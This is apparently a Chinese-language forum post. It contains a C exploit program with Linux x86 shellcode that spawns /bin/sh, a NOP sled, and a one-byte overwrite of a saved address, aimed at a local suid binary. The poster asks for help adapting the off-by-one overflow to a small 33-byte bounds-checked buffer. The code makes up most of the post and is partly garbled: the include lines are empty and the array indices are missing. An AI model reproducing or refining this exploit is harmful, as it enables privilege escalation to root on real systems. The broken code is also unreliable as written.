| 我找到这样一个exploit大概看懂了!可是有点问题!
#include
#include
char sc_linux[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
main()
{
int i, j;
char buffer[1024];
bzero(&buffer, 1024);
for (i=0;i<=(252-sizeof(sc_linux));i++)
{
buffer = 0x90;
}
for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++)
{
buffer = sc_linux[j];
}
buffer[i++] = 0x74; /*
buffer[i++] = 0xfc; * Address of our buffer
buffer[i++] = 0xff; *
buffer[i++] = 0xbf; */
buffer[i++] = 0x5c;
execl("./suid", "suid", buffer, NULL);
}
现在有个suid程序有单字节溢出的问题!但是这个缓冲区有边界检查而且很小。33个字节
就是在第33个字节上溢出。但是多于33个字节就不行了。上面这个溢出利用程序明显需要的缓冲区太大了!谁给我指点一下!不胜感激啊~~~~ |
